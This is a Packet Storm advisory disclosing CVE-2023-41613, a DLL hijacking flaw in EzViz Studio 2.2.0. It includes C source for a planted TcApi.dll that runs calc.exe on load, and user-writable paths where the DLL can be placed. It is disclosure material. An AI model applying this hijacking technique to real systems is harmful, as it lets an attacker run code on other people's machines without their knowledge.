CVE-2023-41613: EzViz Studio 2.2.0 DLL Hijacking ≈ Packet Storm

PoC:

DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)

Author: EAFZ aka myantti3m

CVE: CVE-2023-41613.

Test Environment:

OS: Windows 11 Pro 64 bit(10.0, Build 2261)

EzViz Studio version: 2.2.0

*Technical Description *

*1. **Technical Description *

EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll
doesn’t exist in any of the paths of the DLL search order. In particular,
some paths have writable permissions for normal users as:

· C:\Users<Username>\AppData\Local\Programs\Microsoft VS
Code\bin\TcApi.dll

· C:\Users<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

So we can plant “malicious” TcApi.dll inside these directories and wait
until the application will load it.

POC

We created a malicious DLL file (TcApi.dll) and complied it. In our case,
it opens calc.exe. You can see the code below:

#include <windows.h>

#pragma comment (lib, “user32.lib”)

#include “pch.h”

#include <iostream>

#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule,

   DWORD nReason, LPVOID lpReserved) {

   switch (nReason) {

   case DLL_PROCESS_ATTACH:

          system("calc.exe");

          break;

   case DLL_PROCESS_DETACH:

          break;

   case DLL_THREAD_ATTACH:

          break;

   case DLL_THREAD_DETACH:

          break;

   }

   return TRUE;

}

Copy “malicious” TcApi.dll to

C:\Users<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

If we run the EzVizStudio again, the code from the “malicious” DLL runs